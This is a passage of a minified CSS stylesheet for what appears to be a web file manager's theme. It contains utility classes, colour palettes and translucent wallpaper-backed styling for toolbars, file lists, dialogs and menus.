sans-serif;-webkit-font-smoothing:antialiased;}*,*:before,*:after{-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;}label{font-weight:normal;}pre{border:none;border-radius:0;}::-webkit-scrollbar-track-piece{background-color:rgba(180,180,180,0.06);border-radius:3px;}::-webkit-scrollbar{width:10px;height:10px;}::-webkit-scrollbar-thumb{background-color:rgba(180,180,180,0.2);border-radius:12px;background-clip:padding-box;border:1px solid rgba(180,180,180,0.4);min-height:28px;}::-webkit-scrollbar-thumb:hover{background-color:rgba(180,180,180,0.4);border:1px solid rgba(180,180,180,0.7);}.can-select,.can-select *{-khtml-user-select:text !important;-webkit-user-select:text !important;-moz-user-select:text !important;-ms-user-select:text !important;-o-user-select:text !important;user-select:text !important;}.can-not-select,.can-not-select *{-khtml-user-select:none !important;-webkit-user-select:none !important;-moz-user-select:none !important;-ms-user-select:none !important;-o-user-select:none !important;user-select:none !important;}.fl{float:left;}.fl-left{float:left;}.fl-right{float:right;}.disable,.disabled{cursor:not-allowed;pointer-events:none;}.clear{clear:both;}.hidden{display:none;}.FontAwesome{font-family:FontAwesome;font-weight:normal;font-style:normal;text-decoration:inherit;font-size:18px;}.font-nomal{font-weight:800;}.font-bold,.bold{font-weight:800;}.font-400{font-weight:400;}.font-800{font-weight:800;}.size12{font-size:12px;}.size14{font-size:14px;}.size16{font-size:16px;}.size18{font-size:18px;}.size20{font-size:20px;}.size22{font-size:22px;}.align-left{text-align:left;}.align-center{text-align:center;}.align-right{text-align:right;}.p-5{padding:5px;}.p-10{padding:10px;}.p-15{padding:15px;}.p-20{padding:20px;}.p-25{padding:25px;}.p-30{padding:30px;}.p-35{padding:35px;}.p-40{padding:40px;}.p-45{padding:45px;}.p-50{padding:50px;}.pt-5{padding-top:5px;}.pr-5{padding-right:5px;}.pb-5{padding-bottom:5px;}.pl-5{padding-left:5px;}.pt-10{padding-top:10px;}.pr-10{padding-right:10px;}.pb-10{padding-bottom:10px;}.pl-10{padding-left:10px;}.pt-15{padding-top:15px;}.pr-15{padding-right:15px;}.pb-15{padding-bottom:15px;}.pl-15{padding-left:15px;}.pt-20{padding-top:20px;}.pr-20{padding-right:20px;}.pb-20{padding-bottom:20px;}.pl-20{padding-left:20px;}.pt-25{padding-top:25px;}.pr-25{padding-right:25px;}.pb-25{padding-bottom:25px;}.pl-25{padding-left:25px;}.pt-30{padding-top:30px;}.pr-30{padding-right:30px;}.pb-30{padding-bottom:30px;}.pl-30{padding-left:30px;}.pt-35{padding-top:35px;}.pr-35{padding-right:35px;}.pb-35{padding-bottom:35px;}.pl-35{padding-left:35px;}.pt-40{padding-top:40px;}.pr-40{padding-right:40px;}.pb-40{padding-bottom:40px;}.pl-40{padding-left:40px;}.pt-45{padding-top:45px;}.pr-45{padding-right:45px;}.pb-45{padding-bottom:45px;}.pl-45{padding-left:45px;}.pt-50{padding-top:50px;}.pr-50{padding-right:50px;}.pb-50{padding-bottom:50px;}.pl-50{padding-left:50px;}.m-5{margin:5px;}.m-10{margin:10px;}.m-15{margin:15px;}.m-20{margin:20px;}.m-25{margin:25px;}.m-30{margin:30px;}.m-35{margin:35px;}.m-40{margin:40px;}.m-45{margin:45px;}.m-50{margin:50px;}.mt-5{margin-top:5px;}.mr-5{margin-right:5px;}.mb-5{margin-bottom:5px;}.ml-5{margin-left:5px;}.mt-10{margin-top:10px;}.mr-10{margin-right:10px;}.mb-10{margin-bottom:10px;}.ml-10{margin-left:10px;}.mt-15{margin-top:15px;}.mr-15{margin-right:15px;}.mb-15{margin-bottom:15px;}.ml-15{margin-left:15px;}.mt-20{margin-top:20px;}.mr-20{margin-right:20px;}.mb-20{margin-bottom:20px;}.ml-20{margin-left:20px;}.mt-25{margin-top:25px;}.mr-25{margin-right:25px;}.mb-25{margin-bottom:25px;}.ml-25{margin-left:25px;}.mt-30{margin-top:30px;}.mr-30{margin-right:30px;}.mb-30{margin-bottom:30px;}.ml-30{margin-left:30px;}.mt-35{margin-top:35px;}.mr-35{margin-right:35px;}.mb-35{margin-bottom:35px;}.ml-35{margin-left:35px;}.mt-40{margin-top:40px;}.mr-40{margin-right:40px;}.mb-40{margin-bottom:40px;}.ml-40{margin-left:40px;}.mt-45{margin-top:45px;}.mr-45{margin-right:45px;}.mb-45{margin-bottom:45px;}.ml-45{margin-left:45px;}.mt-50{margin-top:50px;}.mr-50{margin-right:50px;}.mb-50{margin-bottom:50px;}.ml-50{margin-left:50px;}.blue-1{color:#ecf6fd;}.bg-blue-1{background:#ecf6fd;}.bdcolor-blue-1{border-color:#ecf6fd;}.blue-2{color:#d2eafb;}.bg-blue-2{background:#d2eafb;}.bdcolor-blue-2{border-color:#d2eafb;}.blue-3{color:#add8f7;}.bg-blue-3{background:#add8f7;}.bdcolor-blue-3{border-color:#add8f7;}.blue-4{color:#7ec2f3;}.bg-blue-4{background:#7ec2f3;}.bdcolor-blue-4{border-color:#7ec2f3;}.blue-5{color:#49a9ee;}.bg-blue-5{background:#49a9ee;}.bdcolor-blue-5{border-color:#49a9ee;}.blue-6{color:#108ee9;}.bg-blue-6{background:#108ee9;}.bdcolor-blue-6{border-color:#108ee9;}.blue-7{color:#0e77ca;}.bg-blue-7{background:#0e77ca;}.bdcolor-blue-7{border-color:#0e77ca;}.blue-8{color:#0c60aa;}.bg-blue-8{background:#0c60aa;}.bdcolor-blue-8{border-color:#0c60aa;}.blue-9{color:#09488a;}.bg-blue-9{background:#09488a;}.bdcolor-blue-9{border-color:#09488a;}.blue-10{color:#073069;}.bg-blue-10{background:#073069;}.bdcolor-blue-10{border-color:#073069;}.purple-1{color:#f4f3fd;}.bg-purple-1{background:#f4f3fd;}.bdcolor-purple-1{border-color:#f4f3fd;}.purple-2{color:#e4e2fa;}.bg-purple-2{background:#e4e2fa;}.bdcolor-purple-2{border-color:#e4e2fa;}.purple-3{color:#cfcaf6;}.bg-purple-3{background:#cfcaf6;}.bdcolor-purple-3{border-color:#cfcaf6;}.purple-4{color:#b3acf2;}.bg-purple-4{background:#b3acf2;}.bdcolor-purple-4{border-color:#b3acf2;}.purple-5{color:#948aec;}.bg-purple-5{background:#948aec;}.bdcolor-purple-5{border-color:#948aec;}.purple-6{color:#7265e6;}.bg-purple-6{background:#7265e6;}.bdcolor-purple-6{border-color:#7265e6;}.purple-7{color:#6252cd;}.bg-purple-7{background:#6252cd;}.bdcolor-purple-7{border-color:#6252cd;}.purple-8{color:#533eb4;}.bg-purple-8{background:#533eb4;}.bdcolor-purple-8{border-color:#533eb4;}.purple-9{color:#42299a;}.bg-purple-9{background:#42299a;}.bdcolor-purple-9{border-color:#42299a;}.purple-10{color:#321580;}.bg-purple-10{background:#321580;}.bdcolor-purple-10{border-color:#321580;}.cyan-1{color:#ebf8f9;}.bg-cyan-1{background:#ebf8f9;}.bdcolor-cyan-1{border-color:#ebf8f9;}.cyan-2{color:#cfedf0;}.bg-cyan-2{background:#cfedf0;}.bdcolor-cyan-2{border-color:#cfedf0;}.cyan-3{color:#a7dfe3;}.bg-cyan-3{background:#a7dfe3;}.bdcolor-cyan-3{border-color:#a7dfe3;}.cyan-4{color:#76cdd3;}.bg-cyan-4{background:#76cdd3;}.bdcolor-cyan-4{border-color:#76cdd3;}.cyan-5{color:#3db8c1;}.bg-cyan-5{background:#3db8c1;}.bdcolor-cyan-5{border-color:#3db8c1;}.cyan-6{color:#00a2ae;}.bg-cyan-6{background:#00a2ae;}.bdcolor-cyan-6{border-color:#00a2ae;}.cyan-7{color:#008997;}.bg-cyan-7{background:#008997;}.bdcolor-cyan-7{border-color:#008997;}.cyan-8{color:#00707f;}.bg-cyan-8{background:#00707f;}.bdcolor-cyan-8{border-color:#00707f;}.cyan-9{color:#005667;}.bg-cyan-9{background:#005667;}.bdcolor-cyan-9{border-color:#005667;}.cyan-10{color:#003c4e;}.bg-cyan-10{background:#003c4e;}.bdcolor-cyan-10{border-color:#003c4e;}.green-1{color:#ebf8f2;}.bg-green-1{background:#ebf8f2;}.bdcolor-green-1{border-color:#ebf8f2;}.green-2{color:#cfefdf;}.bg-green-2{background:#cfefdf;}.bdcolor-green-2{border-color:#cfefdf;}.green-3{color:#a7e1c4;}.bg-green-3{background:#a7e1c4;}.bdcolor-green-3{border-color:#a7e1c4;}.green-4{color:#76d0a3;}.bg-green-4{background:#76d0a3;}.bdcolor-green-4{border-color:#76d0a3;}.green-5{color:#3dbd7d;}.bg-green-5{background:#3dbd7d;}.bdcolor-green-5{border-color:#3dbd7d;}.green-6{color:#00a854;}.bg-green-6{background:#00a854;}.bdcolor-green-6{border-color:#00a854;}.green-7{color:#00924c;}.bg-green-7{background:#00924c;}.bdcolor-green-7{border-color:#00924c;}.green-8{color:#007b43;}.bg-green-8{background:#007b43;}.bdcolor-green-8{border-color:#007b43;}.green-9{color:#00643b;}.bg-green-9{background:#00643b;}.bdcolor-green-9{border-color:#00643b;}.green-10{color:#004c32;}.bg-green-10{background:#004c32;}.bdcolor-green-10{border-color:#004c32;}.pink-1{color:#feeff5;}.bg-pink-1{background:#feeff5;}.bdcolor-pink-1{border-color:#feeff5;}.pink-2{color:#fdd8e7;}.bg-pink-2{background:#fdd8e7;}.bdcolor-pink-2{border-color:#fdd8e7;}.pink-3{color:#fcb8d3;}.bg-pink-3{background:#fcb8d3;}.bdcolor-pink-3{border-color:#fcb8d3;}.pink-4{color:#fa90ba;}.bg-pink-4{background:#fa90ba;}.bdcolor-pink-4{border-color:#fa90ba;}.pink-5{color:#f7629e;}.bg-pink-5{background:#f7629e;}.bdcolor-pink-5{border-color:#f7629e;}.pink-6{color:#f5317f;}.bg-pink-6{background:#f5317f;}.bdcolor-pink-6{border-color:#f5317f;}.pink-7{color:#dc277d;}.bg-pink-7{background:#dc277d;}.bdcolor-pink-7{border-color:#dc277d;}.pink-8{color:#c11c7b;}.bg-pink-8{background:#c11c7b;}.bdcolor-pink-8{border-color:#c11c7b;}.pink-9{color:#a71278;}.bg-pink-9{background:#a71278;}.bdcolor-pink-9{border-color:#a71278;}.pink-10{color:#8c0776;}.bg-pink-10{background:#8c0776;}.bdcolor-pink-10{border-color:#8c0776;}.red-1{color:#fef0ef;}.bg-red-1{background:#fef0ef;}.bdcolor-red-1{border-color:#fef0ef;}.red-2{color:#fcdbd9;}.bg-red-2{background:#fcdbd9;}.bdcolor-red-2{border-color:#fcdbd9;}.red-3{color:#fabeb9;}.bg-red-3{background:#fabeb9;}.bdcolor-red-3{border-color:#fabeb9;}.red-4{color:#f79992;}.bg-red-4{background:#f79992;}.bdcolor-red-4{border-color:#f79992;}.red-5{color:#f46e65;}.bg-red-5{background:#f46e65;}.bdcolor-red-5{border-color:#f46e65;}.red-6{color:#f04134;}.bg-red-6{background:#f04134;}.bdcolor-red-6{border-color:#f04134;}.red-7{color:#d73435;}.bg-red-7{background:#d73435;}.bdcolor-red-7{border-color:#d73435;}.red-8{color:#bd2636;}.bg-red-8{background:#bd2636;}.bdcolor-red-8{border-color:#bd2636;}.red-9{color:#a31837;}.bg-red-9{background:#a31837;}.bdcolor-red-9{border-color:#a31837;}.red-10{color:#880a38;}.bg-red-10{background:#880a38;}.bdcolor-red-10{border-color:#880a38;}.orange-1{color:#fef3eb;}.bg-orange-1{background:#fef3eb;}.bdcolor-orange-1{border-color:#fef3eb;}.orange-2{color:#fde3cf;}.bg-orange-2{background:#fde3cf;}.bdcolor-orange-2{border-color:#fde3cf;}.orange-3{color:#fccca7;}.bg-orange-3{background:#fccca7;}.bdcolor-orange-3{border-color:#fccca7;}.orange-4{color:#faaf76;}.bg-orange-4{background:#faaf76;}.bdcolor-orange-4{border-color:#faaf76;}.orange-5{color:#f78e3d;}.bg-orange-5{background:#f78e3d;}.bdcolor-orange-5{border-color:#f78e3d;}.orange-6{color:#f56a00;}.bg-orange-6{background:#f56a00;}.bdcolor-orange-6{border-color:#f56a00;}.orange-7{color:#d75000;}.bg-orange-7{background:#d75000;}.bdcolor-orange-7{border-color:#d75000;}.orange-8{color:#b93600;}.bg-orange-8{background:#b93600;}.bdcolor-orange-8{border-color:#b93600;}.orange-9{color:#991b00;}.bg-orange-9{background:#991b00;}.bdcolor-orange-9{border-color:#991b00;}.orange-10{color:#7a0000;}.bg-orange-10{background:#7a0000;}.bdcolor-orange-10{border-color:#7a0000;}.yellow-1{color:#fffaeb;}.bg-yellow-1{background:#fffaeb;}.bdcolor-yellow-1{border-color:#fffaeb;}.yellow-2{color:#fff3cf;}.bg-yellow-2{background:#fff3cf;}.bdcolor-yellow-2{border-color:#fff3cf;}.yellow-3{color:#ffe9a7;}.bg-yellow-3{background:#ffe9a7;}.bdcolor-yellow-3{border-color:#ffe9a7;}.yellow-4{color:#ffdd76;}.bg-yellow-4{background:#ffdd76;}.bdcolor-yellow-4{border-color:#ffdd76;}.yellow-5{color:#ffce3d;}.bg-yellow-5{background:#ffce3d;}.bdcolor-yellow-5{border-color:#ffce3d;}.yellow-6{color:#ffbf00;}.bg-yellow-6{background:#ffbf00;}.bdcolor-yellow-6{border-color:#ffbf00;}.yellow-7{color:#e09a00;}.bg-yellow-7{background:#e09a00;}.bdcolor-yellow-7{border-color:#e09a00;}.yellow-8{color:#c17500;}.bg-yellow-8{background:#c17500;}.bdcolor-yellow-8{border-color:#c17500;}.yellow-9{color:#a04f00;}.bg-yellow-9{background:#a04f00;}.bdcolor-yellow-9{border-color:#a04f00;}.yellow-10{color:#802800;}.bg-yellow-10{background:#802800;}.bdcolor-yellow-10{border-color:#802800;}.grey-1{color:#fbfbfb;}.bg-grey-1{background:#fbfbfb;}.bdcolor-grey-1{border-color:#fbfbfb;}.grey-2{color:#f7f7f7;}.bg-grey-2{background:#f7f7f7;}.bdcolor-grey-2{border-color:#f7f7f7;}.grey-3{color:#f5f5f5;}.bg-grey-3{background:#f5f5f5;}.bdcolor-grey-3{border-color:#f5f5f5;}.grey-4{color:#e9e9e9;}.bg-grey-4{background:#e9e9e9;}.bdcolor-grey-4{border-color:#e9e9e9;}.grey-5{color:#d9d9d9;}.bg-grey-5{background:#d9d9d9;}.bdcolor-grey-5{border-color:#d9d9d9;}.grey-6{color:#bfbfbf;}.bg-grey-6{background:#bfbfbf;}.bdcolor-grey-6{border-color:#bfbfbf;}.grey-7{color:#919191;}.bg-grey-7{background:#919191;}.bdcolor-grey-7{border-color:#919191;}.grey-8{color:#5a5a5a;}.bg-grey-8{background:#5a5a5a;}.bdcolor-grey-8{border-color:#5a5a5a;}.grey-9{color:#404040;}.bg-grey-9{background:#404040;}.bdcolor-grey-9{border-color:#404040;}.grey-10{color:#222;}.bg-grey-10{background:#222;}.bdcolor-grey-10{border-color:#222;}.translation-fast{-webkit-transition:all 0.168s ease-in-out;-moz-transition:all 0.168s ease-in-out;-o-transition:all 0.168s ease-in-out;-ms-transition:all 0.168s ease-in-out;transition:all 0.168s ease-in-out;}.translation-nomal{-webkit-transition:all 0.25s ease-in-out;-moz-transition:all 0.25s ease-in-out;-o-transition:all 0.25s ease-in-out;-ms-transition:all 0.25s ease-in-out;transition:all 0.25s ease-in-out;}.translation-slow{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-200{-webkit-transition:all 0.2s ease-in-out;-moz-transition:all 0.2s ease-in-out;-o-transition:all 0.2s ease-in-out;-ms-transition:all 0.2s ease-in-out;transition:all 0.2s ease-in-out;}.translation-300{-webkit-transition:all 0.3s ease-in-out;-moz-transition:all 0.3s ease-in-out;-o-transition:all 0.3s ease-in-out;-ms-transition:all 0.3s ease-in-out;transition:all 0.3s ease-in-out;}.translation-500{-webkit-transition:all 0.5s ease-in-out;-moz-transition:all 0.5s ease-in-out;-o-transition:all 0.5s ease-in-out;-ms-transition:all 0.5s ease-in-out;transition:all 0.5s ease-in-out;}.translation-1000{-webkit-transition:all 1.0s ease-in-out;-moz-transition:all 1.0s ease-in-out;-o-transition:all 1.0s ease-in-out;-ms-transition:all 1.0s ease-in-out;transition:all 1.0s ease-in-out;}.label{font-weight:400;font-size:1em;display:inline-block;}.label.label-blue-deep{background:#1b63ab;color:#fff;}.label.label-blue-nomal{background:#39f;color:#fff;}.label.label-blue-light{background:#d4e9ff;color:#39f;}.label.label-grey-deep{background:#464c5b;color:#fff;}.label.label-grey-nomal{background:#657180;color:#fff;}.label.label-grey-light{background:#9ea7b4;color:#fff;}.label.label-yellow-deep{background:#ff9900;color:#fff;}.label.label-yellow-nomal{background:#ffc267;color:#fff;}.label.label-yellow-light{background:#ffe2b6;color:#ff9900;}.label.label-green-deep{background:#068c49;color:#fff;}.label.label-green-nomal{background:#00cc66;color:#fff;}.label.label-green-light{background:#beffde;color:#068c49;}.cursor-mouse.cursor-default *{cursor:url("../../../images/common/cursor/default.png"), auto !important;}.cursor-mouse.cursor-move *{cursor:url("../../../images/common/cursor/move.png"), auto !important;}.cursor-mouse.cursor-down *{cursor:url("../../../images/common/cursor/down.png"), auto !important;}.cursor-mouse.cursor-add *{cursor:url("../../../images/common/cursor/add.png"), auto !important;}.text-color-set{color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;}@media screen and (max-width:100000px){body{ position:absolute;top:0px;left:0px;bottom:0px;right:0px;} body .x-folder{ background-image:url("../../images/file_icon/icon_others/folder_alpha.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_alpha.png',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_alpha.png',sizingMethod='scale');} body .full-background{ position:absolute;top:0px;left:0px;bottom:0px;right:0px;background:#2d2d2d url('./../../images/wall_page/3.jpg');background-size:cover;background-size:100% 100%;} body .full-background:before{ width:100%;height:100%;display:block;content:" ";background:#2d2d2d url('./../../images/wall_page/3.jpg');background-size:cover;background-size:100% 100%;filter:url(blur.svg#full-background);-webkit-filter:blur(10px);-moz-filter:blur(10px);-ms-filter:blur(10px);filter:blur(10px);} body .btn .font-icon, body .btn.btn-default .font-icon{ color:rgba(255,255,255,0.8);} body .aui-outer .btn .font-icon, body .edit-main .btn .font-icon{ color:#999;} body .common-footer{ background:rgba(234,234,234,0.1);color:rgba(255,255,255,0.6);border-top:1px solid rgba(234,234,234,0.15);} body .common-footer a{ color:rgba(255,255,255,0.8);} body .context-menu-list{ box-shadow:0 10px 40px rgba(0,0,0,0.4);border-radius:0;background:rgba(255,255,255,0.95);} body .context-menu-list .context-menu-item{ line-height:25px;height:25px;padding:0 15px 0 20px;} body .aui-outer{ *border:1px solid #ccc;border:1px solid #ccc \0/IE9;box-shadow:0px 5px 20px rgba(0,0,0,0.5), 0 0 0 1px rgba(255,255,255,0.2);} body .aui-state-focus .aui-outer{ box-shadow:0px 5px 30px rgba(0,0,0,0.7), 0 0 0 1px rgba(255,255,255,0.2);} body .aui-buttons{ border-top:1px solid rgba(255,255,255,0.2);} body div.dialog-simple .aui-title{ border-radius:0;} body .aui-buttons button.aui-state-highlight{ background:linear-gradient(to right,#44abf6,#2865e2);} body .aui-state-focus .aui-title, body .aui-title{ background-color:rgba(0,0,0,0.8);box-shadow:0 1px 0 rgba(255,255,255,0.15);background:#2d2d2d url('./../../images/wall_page/3.jpg');background-size:cover;text-shadow:0px 0px 0px #fff, 0px 0px 4px #000, 0px 0px 5px #000;opacity:0.95;} body .dropdown-menu > li > a:hover, body .dropdown-menu .this a, body .dropdown-menu > li > a:focus{ background:linear-gradient(to right,#44abf6,#2865e2);} body .topbar{ background:rgba(234,234,234,0.23);box-shadow:0 0 6px rgba(0,0,0,0.2);border-bottom:1px solid rgba(255,255,255,0.01);border:none;} body .topbar .content{ border-bottom:none;} body .topbar .content .topbar-menu{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border-color:rgba(234,234,234,0.05);} body .topbar .content .open .topbar-menu, body .topbar .content .topbar-menu:hover, body .topbar .content .topbar-menu.this{ background:rgba(234,234,234,0.23);} body .topbar .content .share-title, body .topbar .content .share-info, body .topbar .content .share-info .time{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .topbar .content .top-right div.share-info-user{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .frame-main{ background:rgba(221,221,221,0.02);} body .frame-main .frame-right .frame-right-main .tools{ background:rgba(221,221,221,0.02);border-bottom:1px solid rgba(234,234,234,0.15);box-shadow:1px 2px 15px rgba(0,0,0,0.2);} body .frame-main .frame-right .frame-right-main .tools .font-icon{ color:#fff;} body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size:hover .dropdown-toggle, body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size.open .dropdown-toggle{ background:rgba(234,234,234,0.23);color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .frame-main .frame-right .frame-right-main .tools .tools-right .set-icon-size .set-icon-size-slider .slider-bg{ background:#666;} body .frame-main .frame-right .file-select-info{ background:#000;background:rgba(0,0,0,0.2);color:#aaa;opacity:0.5;filter:alpha(opacity=50);} body div.frame-header{ background:rgba(221,221,221,0.02);border-bottom:1px solid rgba(234,234,234,0.05);} body div.frame-main .frame-left{ background:rgba(221,221,221,0.02);border-right:1px solid rgba(234,234,234,0.15);} body div.frame-main .frame-left .bottom-box{ background:rgba(221,221,221,0.02);border-right:none;border-top:1px solid rgba(234,234,234,0.15);} body div.frame-main .frame-left .bottom-box .cell{ background:rgba(221,221,221,0.02);color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border:1px solid rgba(234,234,234,0.05);box-shadow:0 0 10px rgba(0,0,0,0.1);} body div.frame-main .frame-left .bottom-box .cell:hover{ background:rgba(234,234,234,0.16);} body .user-space-info{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .group-space-use{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.15);} body .btn-default{ text-shadow:none;} body #btn-history-back, body #home, body #fav{ border-right-color:transparent;} body .btn#home{ border-radius:3px 0 0 3px;} body .btn#up, body .btn#search{ border-radius:0 3px 3px 0;} body .input-style{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .frame-header .header-content .header-right input, body .frame-header .header-content .header-right input:focus{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .frame-header .header-content .header-right input{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .button-style{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .button-style:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .button-style:active, body .button-style.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .frame-main .frame-right .frame-right-main .tools button.btn, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn, body .frame-header .header-content button.btn, body .frame-header .header-content .header-right .btn-default, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .frame-main .frame-right .frame-right-main .tools button.btn:hover, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn:hover, body .frame-header .header-content button.btn:hover, body .frame-header .header-content .header-right .btn-default:hover, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .frame-main .frame-right .frame-right-main .tools button.btn:active, body .frame-main .frame-right .frame-right-main .tools button.btn.active, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn:active, body .frame-main .frame-right .frame-right-main .tools .tools-left button.btn.active, body .frame-header .header-content button.btn:active, body .frame-header .header-content button.btn.active, body .frame-header .header-content .header-right .btn-default:active, body .frame-header .header-content .header-right .btn-default.active, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path:active, body .frame-main .frame-right .frame-right-main .admin-real-path a.dialog-goto-path.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .header-middle .btn-default{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.23);box-shadow:0 5px 10px rgba(234,234,234,0.1) inset;} body .header-middle .btn-default:hover{ box-shadow:inset 0 2px 4px rgba(0,0,0,0.1), 0 0 5px rgba(234,234,234,0.15);border-color:rgba(234,234,234,0.15);} body .header-middle .btn-default:active, body .header-middle .btn-default.active{ box-shadow:inset 0 4px 10px rgba(0,0,0,0.4);border-color:rgba(234,234,234,0.23);} body .header-middle .disable .font-icon{ opacity:0.6;filter:alpha(opacity=60);} body .header-middle #yarnball{ border-right-color:transparent;background:none;border:1px solid rgba(234,234,234,0.23);box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .header-middle #yarnball-input input.path{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .header-middle #yarnball-input{ background:none;border:1px solid rgba(234,234,234,0.23);border-right-color:transparent;box-shadow:inset 0px 0px 20px rgba(0,0,0,0.15);} body .header-middle #yarnball .yarnball .yarnlet a{ background:none;color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body .header-middle #yarnball .yarnball .yarnlet a::after{ content:'/';padding-left:5px;} body .header-middle #yarnball .yarnball .yarnlet a:hover{ color:rgba(234,234,234,0.23);} body .header-middle #yarnball .yarnball .yarnlet a.curDropToPath{ color:#f60;} body .header-middle #yarnball .yarnball .yarnlet a, body .header-middle #yarnball .yarnball .yarnlet a:link, body .header-middle #yarnball .yarnball .yarnlet a:visited{ padding:0px 8px 0px 8px;margin-left:-10px;} body .header-middle #yarnball .yarnball .yarnlet .left-yarn{ background:none;} body .frame-header .header-content .btn-default:active, body .frame-header .header-content .btn-default.active{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;background:rgba(234,234,234,0.1);border-color:rgba(234,234,234,0.15);} body .file-draging.file-list-icon div.file .filename, body .file-draging.file-list-list div.file .filename, body .file-draging.file-list-split div.file .filename{ visibility:hidden;} body .file-draging.file-list-icon div.file.handle_target .filename, body .file-draging.file-list-list div.file.handle_target .filename, body .file-draging.file-list-split div.file.handle_target .filename{ visibility:visible;} body .file-list-icon .file{ color:#fff;} body .file-list-list .file{ border-bottom:1px solid rgba(234,234,234,0.05);} body .file-list-list .file.file2{ background:rgba(221,221,221,0.02);} body .file-continer .file, body .file-continer .file2{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;text-shadow:0 0 1px #fff;} body .file-continer .file.hover, body .file-continer .file.select-split-parent, body .file-continer .file2.hover, body .file-continer .file2.select-split-parent{ filter:none;background:rgba(234,234,234,0.1);border:1px solid rgba(234,234,234,0.1);} body .file-continer .file.select, body .file-continer .file.file-select-drag-temp, body .file-continer .file2.select, body .file-continer .file2.file-select-drag-temp{ background:rgba(234,234,234,0.16);border:1px solid rgba(234,234,234,0.23);border-bottom:1px solid rgba(234,234,234,0.23);} body .file-list-split .split-box{ border-right:1px solid #e6e6e6;border-right:1px solid rgba(150,150,150,0.15);} body .file-list-split .split-box.split-hover{ background:rgba(5,5,5,0.2);background:rgba(0,0,0,0.01);box-shadow:0 0 100px rgba(5,5,5,0.2) inset;border-bottom-color:rgba(255,255,255,0.2);} body .file-list-split .split-box.split-select{ background:rgba(0,0,0,0.2);background:rgba(0,0,0,0.01);box-shadow:0 0 100px rgba(0,0,0,0.2) inset;border-left:1px solid #eee;border-color:rgba(0,0,0,0.2);margin-left:-1px;border-bottom:5px solid #2196F3;border-bottom-color:rgba(255,255,255,0.4);} body .file-list-split .file .children-open{ background:rgba(255,255,255,0.01);} body .file-list-split .file .children-open i.font-icon{ color:#fff;} body .context-menu-list .context-menu-item.hover{ background:linear-gradient(to right,#44abf6,#2865e2);} body #list-type-header{ background:none;} body #main-title{ background:rgba(234,234,234,0.1);border-bottom:1px solid rgba(234,234,234,0.15);box-shadow:0px 5px 5px rgba(0,0,0,0.05);} body #main-title .this{ background:rgba(234,234,234,0.16);} body #main-title .filename, body #main-title .filesize, body #main-title .filetype, body #main-title .filetime{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;border-right:1px solid rgba(234,234,234,0.23);} body #main-title .filename:hover, body #main-title .filesize:hover, body #main-title .filetype:hover, body #main-title .filetime:hover{ background:rgba(234,234,234,0.16);} body#page-editor .frame-main .tools-left{ background:rgba(234,234,234,0.15);border-bottom:1px solid rgba(234,234,234,0.05);} body#page-editor .frame-main .tools-left a{ color:#fff;text-shadow:0 0 0px #fff, 0 1px 3px #666666;} body#page-editor .frame-main .frame-right .frame-right-main .frame{ border-left:1px solid rgba(234,234,234,0.05);} body #body .menu-left, body #body .app-menu-left{ background:rgba(230,230,230,0.2);background:#2d2d2d url('./../../images/wall_page/3.jpg');background-size:cover;} body #body .menu-left h1, body #body .app-menu-left h1{ color:#fff;font-weight:400;} body #body .menu-left .setting a, body #body .app-menu-left .setting a{ color:#fff;} body #body .menu-left .setting a:hover, body #body .app-menu-left .setting a:hover{ 